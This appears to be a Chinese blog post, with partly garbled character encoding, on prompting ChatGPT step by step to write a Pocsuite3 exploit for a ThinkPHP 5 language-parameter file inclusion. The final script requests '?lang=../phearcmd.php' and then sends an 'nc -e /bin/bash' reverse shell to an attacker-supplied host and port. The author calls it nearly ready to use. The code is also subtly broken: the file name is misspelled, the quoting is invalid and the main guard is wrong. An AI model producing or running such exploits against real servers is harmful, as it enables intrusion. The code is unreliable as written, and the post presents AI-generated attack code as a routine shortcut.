通過(guò)ChatGPT來(lái)快速編寫(xiě)Pocsuite3
前言
這一模型可以與人類進(jìn)行談話般的交互,可以回答追問(wèn),連續(xù)性的問(wèn)題,承認(rèn)其回答中的錯(cuò)誤,指出人類提問(wèn)時(shí)的不正確前提,拒絕回答不適當(dāng)?shù)膯?wèn)題。
簡(jiǎn)單來(lái)說(shuō),ChatGPT是一個(gè)AI,能夠分析我們題出的問(wèn)題,并且對(duì)此做出解答。可以通過(guò)ChatGPT來(lái)分析代碼,或者讓其根據(jù)我們的需求寫(xiě)出相應(yīng)的代碼,如下。
所以,我就在想,能不能讓它給我們編寫(xiě)poc,簡(jiǎn)化平時(shí)的一個(gè)工作,于是便有了這篇文章。
分析
發(fā)現(xiàn)
我發(fā)現(xiàn),ChatGPT緩存了當(dāng)此詢問(wèn)的結(jié)果,當(dāng)我們前后兩個(gè)問(wèn)題相似的時(shí)候,ChatGPT會(huì)去分析兩個(gè)問(wèn)題的一個(gè)相似度,如果相似度過(guò)高,則會(huì)返回上一次分析的結(jié)果。而且對(duì)于有歧義的語(yǔ)句,其處理結(jié)果誤差比較大,所以我們可以一開(kāi)始給出一個(gè)簡(jiǎn)單的語(yǔ)句,然后通過(guò)逐步的訓(xùn)練,讓其結(jié)果更加符合我們的預(yù)期。
過(guò)程
原理
在一開(kāi)始,最好向CG(ChatGPT的簡(jiǎn)稱)提供漏洞的相關(guān)原理,但是由我們直接去敘述,其準(zhǔn)確性比較低,因?yàn)檎Z(yǔ)言存在歧義,那么,我們可以通過(guò)引導(dǎo)的方式,去讓CG了解和漏洞有關(guān)的信息,比如ThinkPHP最新的漏洞原理是因?yàn)槎嗾Z(yǔ)言模式的開(kāi)啟導(dǎo)致的文件包含,如果我們直接詢問(wèn)。
我們會(huì)發(fā)現(xiàn),CG無(wú)法為我們解析出來(lái),因?yàn)槠鋵?shí)在這里lang_switch_on是config.php返回?cái)?shù)組中的一個(gè)鍵名,準(zhǔn)確來(lái)說(shuō)并不是參數(shù),所以這里解析才會(huì)出錯(cuò)。我們知道config.php會(huì)返回一個(gè)數(shù)組,但是CG因?yàn)椴⒉粫?huì)去解析config.php,所以在它并不覺(jué)得config.php會(huì)返回什么。
但是我們換一種方法,我們?cè)儐?wèn),
我們會(huì)發(fā)現(xiàn),CG給出了我們一個(gè)流程,那么在這里,CG就記住了這一答案,當(dāng)我們?cè)诼┒丛碇屑尤肓诉@句話,那么CG就能正確解析。
分段
當(dāng)我們直接通過(guò)一大段話讓其給我們編寫(xiě)程序的時(shí)候,你會(huì)發(fā)現(xiàn)會(huì)有很多錯(cuò)誤,如下。
根據(jù)我上面的發(fā)現(xiàn),我突然想 ,我們可以先給出一個(gè)簡(jiǎn)單的需求,在后面不斷基于之前給的答案,增加其準(zhǔn)確度就行。如下。
首先,詢問(wèn)是否知道pocsuite,并要求給出一個(gè)例子。
import pocsuite3 from pocsuite3.api import requests as req from pocsuite3.api import register_poc from pocsuite3.api import Output, POCBase class TestPOC(POCBase): vulID = '12345' version = '1.0' author = 'test' vulDate = '2022-01-01' createDate = '2022-01-01' updateDate = '2022-01-01' references = ['https://example.com/vul/12345'] name = 'Test POC' appPowerLink = 'https://example.com' appName = 'Test' appVersion = '1.0' vulType = 'Test Vul' desc = '''Test POC Description''' samples = [''] def _attack(self): # your code here pass def _verify(self): # your code here result = {} return self.parse_output(result) def parse_output(self, result): output = Output(self) # your code here return output def main(): register_poc(TestPOC) if __name__ == '__main__': main()
接著,添加對(duì)漏洞的描述,要求其改進(jìn)。
import pocsuite3 from pocsuite3.api import requests as req from pocsuite3.api import register_poc from pocsuite3.api import Output, POCBase class ThinkPHP5_File_Inclusion(POCBase): vulID = '12345' version = '1.0' author = 'test' vulDate = '2022-01-01' createDate = '2022-01-01' updateDate = '2022-01-01' references = ['https://example.com/vul/12345'] name = 'ThinkPHP5 File Inclusion Vulnerability' appPowerLink = 'https://thinkphp.cn' appName = 'ThinkPHP' appVersion = '5.0' vulType = 'File Inclusion' desc = ''' This POC checks for a file inclusion vulnerability in ThinkPHP 5.0. To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true, and a malicious lang parameter must be passed in the URL. ''' samples = [''] def _attack(self): # your code here pass def _verify(self): result = {} # your code here return self.parse_output(result) def parse_output(self, result): output = Output(self)
這時(shí)候,我們?cè)偬砑右恍┬畔ⅰ?/p>
import pocsuite3 from pocsuite3.api import requests as req from pocsuite3.api import register_poc from pocsuite3.api import Output, POCBase class ThinkPHP5_File_Inclusion(POCBase): vulID = '12345' version = '1.0' author = 'test' vulDate = '2022-12-09' createDate = '2022-12-09' updateDate = '2022-12-09' references = ['https://tttang.com/archive/1865/'] name = 'ThinkPHP5 File Inclusion Vulnerability' appPowerLink = 'https://thinkphp.cn' appName = 'ThinkPHP' appVersion = '5.0' vulType = 'File Inclusion' desc = ''' This POC checks for a file inclusion vulnerability in ThinkPHP 5.0. To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true, and a malicious lang parameter must be passed in the URL. This can allow an attacker to include the phearcmd.php file and execute arbitrary commands. ''' samples = [''] def _attack(self): # your code here pass def _verify(self): result = {} # your code here # send a request with a malicious lang parameter url = self.url + '?lang=../phearcmd.php' r = req.get(url) # check if the phearcmd.php file was included if 'PhearCommand execution' in r.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('The vulnerability could not be verified') return output def main(): register_poc(ThinkPHP5_File_Inclusion) if name == 'main': main()
最后,我們?cè)傺a(bǔ)充一點(diǎn)。
import pocsuite3 from pocsuite3.api import requests as req from pocsuite3.api import register_poc from pocsuite3.api import Output, POCBase class ThinkPHP5_File_Inclusion(POCBase): vulID = '12345' version = '1.0' author = 'test' vulDate = '2022-12-09' createDate = '2022-12-09' updateDate = '2022-12-09' references = ['https://tttang.com/archive/1865/'] name = 'ThinkPHP5 File Inclusion Vulnerability' appPowerLink = 'https://thinkphp.cn' appName = 'ThinkPHP' appVersion = '5.0' vulType = 'File Inclusion' desc = ''' This POC checks for a file inclusion vulnerability in ThinkPHP 5.0. To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true, and a malicious lang parameter must be passed in the URL. This can allow an attacker to include the phearcmd.php file and execute arbitrary commands, including a reverse shell. ''' samples = [''] def _attack(self): # your code here # send a request with a malicious lang parameter to include phearcmd.php url = self.url + '?lang=../phearcmd.php' r = req.get(url) # check if the phearcmd.php file was included if 'PhearCommand execution' in r.text: # send a request to execute a reverse shell command command = 'php -r "system('nc -e /bin/bash {0} {1}');"'.format(self.options.get('lhost'), self.options.get('lport')) url = self.url + '?phearcmd=' + command req.get(url) def _verify(self): result = {} # your code here return self.parse_output(result) def parse_output(self, result): output = Output(self) # no output is necessary for this POC return output def main(): register_poc(ThinkPHP5_File_Inclusion) if name == 'main': main()
到這里,基本上就可以拿來(lái)改改就能直接使用了。
結(jié)論
通過(guò)以上的利用和分析,我們能感受到CG的一個(gè)強(qiáng)大,當(dāng)CG對(duì)于我們的一個(gè)問(wèn)題的解決結(jié)果誤差較大的時(shí)候,我們可以逐步進(jìn)行求解,讓其引擎對(duì)結(jié)果進(jìn)行不斷的修正,這樣最終的結(jié)果誤差較小。以上只是一個(gè)簡(jiǎn)單的案例,還有更多的可能等待挖掘。
審核編輯:湯梓紅
-
AI
+關(guān)注
關(guān)注
87文章
29435瀏覽量
267750 -
模型
+關(guān)注
關(guān)注
1文章
3073瀏覽量
48586 -
代碼
+關(guān)注
關(guān)注
30文章
4700瀏覽量
68110 -
編寫(xiě)
+關(guān)注
關(guān)注
0文章
29瀏覽量
8417 -
ChatGPT
+關(guān)注
關(guān)注
28文章
1536瀏覽量
7270
原文標(biāo)題:通過(guò)ChatGPT來(lái)快速編寫(xiě)Pocsuite3
文章出處:【微信號(hào):菜鳥(niǎo)學(xué)信安,微信公眾號(hào):菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。
發(fā)布評(píng)論請(qǐng)先 登錄
相關(guān)推薦
評(píng)論